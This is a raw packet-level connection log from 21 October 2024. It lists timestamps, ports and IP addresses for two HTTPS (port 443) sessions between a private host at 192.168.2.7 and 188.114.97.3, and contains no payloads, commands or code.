Oct 21, 2024 17:05:26.390324116 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390335083 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390343904 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390377045 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390400887 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390405893 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390423059 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390461922 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390484095 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390579939 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390607119 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390645981 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390650988 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390696049 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390718937 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390727997 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390736103 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390779972 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390786886 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390793085 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.390826941 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.390842915 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391060114 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391093969 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391129017 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391134977 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391172886 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391195059 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391364098 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391396046 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391432047 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391438007 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391483068 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391499996 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391807079 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391839027 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391870022 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391875029 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.391916990 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.391944885 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.392400026 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.392427921 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.392484903 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.392493010 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.392508030 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.392569065 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.392996073 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393019915 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393053055 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393060923 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393098116 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393115044 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393342018 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393369913 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393404007 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393412113 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393449068 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393471003 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393898010 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393918991 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393963099 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.393973112 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.393996954 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394026041 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394117117 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394145966 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394181013 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394191980 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394206047 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394238949 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394917011 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394937992 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394984007 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.394984961 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.394999027 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.395020008 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.395046949 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.395056009 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.395068884 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.395097971 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.431107044 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.431201935 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.470554113 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.470635891 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.470649958 CEST	443	49746	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:26.471165895 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:26.481657982 CEST	49746	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.101831913 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.101875067 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:53.102153063 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.138154984 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.138186932 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:53.710563898 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:53.710643053 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.819166899 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.819257975 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:53.819648981 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:53.819726944 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.842238903 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:53.883342028 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531385899 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531513929 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.531544924 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531641960 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531697989 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.531707048 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531824112 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531908989 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531941891 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.531954050 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.531966925 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.532099962 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.532155991 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.532165051 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.532202959 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.532210112 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.532253981 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.536901951 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.536963940 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.586316109 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.586502075 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.586534023 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.586589098 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611115932 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611298084 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611344099 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611435890 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611458063 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611536980 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611551046 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611593008 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611840010 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611885071 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.611922026 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.611969948 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.612013102 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.612200975 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.612497091 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.612550020 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.612715006 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.612761974 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.612807035 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.612867117 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.613238096 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.613348007 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.613358021 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.613399982 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.695954084 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696127892 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696158886 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696197033 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696247101 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.696270943 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696300030 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.696311951 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.696615934 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696675062 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696722031 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.696729898 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696806908 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.696933985 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.696970940 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.697110891 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697160006 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697168112 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.697175026 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697240114 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.697240114 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.697746992 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697792053 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697823048 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697825909 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.697833061 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.697868109 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699789047 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.699830055 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699831963 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.699843884 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.699872017 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699881077 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.699898005 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699906111 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.699928045 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699964046 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.699968100 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.700218916 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.700428009 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.700849056 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.701160908 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.701215029 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777299881 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777400017 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777414083 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777430058 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777446985 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777448893 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777477980 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777492046 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777643919 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777693987 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.777704954 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.777764082 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.778101921 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.778157949 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.778475046 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.778547049 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.778589964 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.778635025 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.779095888 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.779158115 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.779424906 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.779484034 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.779505014 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.779558897 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.779567957 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.779620886 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.780508041 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.780570984 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.780575037 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.780591011 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.780616045 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.780626059 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.780647993 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.780693054 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.781430960 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.781493902 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.858278036 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.858324051 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.858405113 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.858428001 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.858454943 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.858475924 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859280109 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859338999 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859343052 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859354973 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859379053 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859394073 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859400034 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859435081 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859452009 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859453917 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859462976 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859483004 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859500885 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859503984 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859509945 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859532118 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859549046 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859591961 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859636068 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859673977 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859715939 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.859761000 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.859801054 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860270023 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860312939 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860481024 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860532045 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860543013 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860595942 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860632896 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860671997 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860742092 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860785961 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860786915 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860797882 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.860821009 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.860843897 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.861510038 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.861553907 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.861572981 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.861610889 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.861807108 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.861851931 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.861852884 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.861865044 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.861886978 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.861902952 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.862694979 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.862711906 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.862787008 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.862795115 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.863375902 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.863631010 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.863646984 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.863693953 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.863702059 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.863724947 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.863744020 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.864542961 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.864557981 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.864610910 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.864619017 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.865902901 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.865922928 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.865959883 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.865967989 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.865978956 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.866014004 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.939794064 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.939819098 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.939898014 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940027952 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940063000 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940079927 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940118074 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940243006 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940258980 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940300941 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940308094 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940331936 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940352917 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940375090 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940390110 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940445900 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940453053 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.940479994 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.940494061 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.945655107 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.945672989 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.945745945 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.945756912 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.945827007 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.946266890 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946281910 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946331978 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.946343899 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946381092 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946382046 CEST	49930	443	192.168.2.7	188.114.97.3
Oct 21, 2024 17:05:54.946393013 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946412086 CEST	443	49930	188.114.97.3	192.168.2.7
Oct 21, 2024 17:05:54.946436882 CEST	49930	443	192.168.2.7	188.114.97.3
